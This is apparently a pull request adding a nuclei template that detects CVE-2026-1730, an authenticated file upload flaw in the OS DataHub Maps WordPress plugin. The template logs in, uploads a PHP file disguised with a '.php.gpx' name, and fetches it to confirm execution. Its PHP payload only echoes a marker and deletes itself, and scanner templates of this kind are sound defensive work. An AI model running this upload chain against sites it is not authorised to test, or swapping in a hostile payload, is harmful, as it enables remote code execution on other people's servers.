### PR TITLE
Add CVE-2026-1730 - OS DataHub Maps File Upload Vulnerability

### DIFF
--- a/http/cves/2026/CVE-2026-1730.yaml
+++ b/http/cves/2026/CVE-2026-1730.yaml
@@ -1,0 +1,91 @@
+id: CVE-2026-1730
+
+info:
+  name: OS DataHub Maps < 1.8.4 - Arbitrary File Upload
+  author: stranger00135
+  severity: critical
+  description: |
+    The OS DataHub Maps plugin for WordPress is vulnerable to arbitrary file upload due to insufficient file type validation in the add_file_and_ext function in versions up to and including 1.8.3. This makes it possible for authenticated attackers with subscriber-level and above permissions to upload arbitrary files on the affected site's server which may make remote code execution possible.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/os-datahub-maps/os-datahub-maps-183-arbitrary-file-upload
+    - https://plugins.trac.wordpress.org/changeset/3202615/os-datahub-maps
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2026-1730
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 4
+    publicwww-query: "/wp-content/plugins/os-datahub-maps/"
+  tags: cve,cve2026,wordpress,wp-plugin,fileupload,rce,os-datahub-maps,authenticated
+
+variables:
+  username: "{{username}}"
+  password: "{{password}}"
+  filename: "{{randstr}}.php.gpx"
+
+http:
+  - raw:
+      - |
+        GET /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+        
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        POST /wp-admin/async-upload.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=---------------------------NUCLEI
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check; {{cookies}}
+        
+        -----------------------------NUCLEI
+        Content-Disposition: form-data; name="name"
+        
+        {{filename}}
+        -----------------------------NUCLEI
+        Content-Disposition: form-data; name="action"
+        
+        upload-attachment
+        -----------------------------NUCLEI
+        Content-Disposition: form-data; name="async-upload"; filename="{{filename}}"
+        Content-Type: text/xml
+        
+        <?php @error_reporting(0); echo md5('nuclei_cve_2026_1730'); @unlink(__FILE__); ?>
+        -----------------------------NUCLEI--
+
+      - |
+        GET {{upload_url}} HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_4
+        words:
+          - '{{md5("nuclei_cve_2026_1730")}}'
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: upload_url
+        part: body_3
+        group: 1
+        regex:
+          - '"url":"(http[^"]+)"'
+        internal: true
+
+      - type: kval
+        kval:
+          - cookies


### PR DESCRIPTION
This PR adds a nuclei template for CVE-2026-1730, an arbitrary file upload vulnerability in the OS DataHub Maps WordPress plugin versions < 1.8.4.

## Vulnerability Details
- **Plugin**: OS DataHub Maps
- **Affected Versions**: < 1.8.4
- **Vulnerability Type**: Arbitrary File Upload (CWE-434)
- **CVSS Score**: 8.8 (High)
- **Authentication Required**: Yes (Subscriber+)

## Technical Details
The vulnerability exists in the `add_file_and_ext` function which uses `stripos()` to validate file extensions. This allows attackers to bypass file type restrictions by using filenames like `malicious.php.gpx`.

## Testing
Tested against WordPress 6.9.1 with os-datahub-maps 1.8.3.

## References
- https://plugins.trac.wordpress.org/changeset/3202615/os-datahub-maps